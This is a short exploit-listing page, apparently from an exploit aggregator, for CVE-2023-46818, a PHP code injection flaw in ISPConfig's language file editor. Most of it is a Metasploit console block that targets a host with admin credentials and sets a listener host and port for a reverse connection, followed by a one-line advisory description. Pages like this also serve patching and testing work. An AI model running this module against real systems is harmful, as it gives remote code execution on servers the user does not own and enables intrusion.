Exploit for Code Injection in Ispconfig CVE-2023-46818

Name: Exploit for Code Injection in Ispconfig CVE-2023-46818
Rating: 5 (110 reviews)

2025-06-25 | CVSS 7.2

## https://sploitus.com/exploit?id=4E9BEB9E-0875-50ED-BA5D-240D2EBB6DB0
# Metasploit-module
Metasploit Module

![image](https://github.com/user-attachments/assets/9c78e7e6-c326-4379-ba12-820cffd9528b)


```bash
use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
```
An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.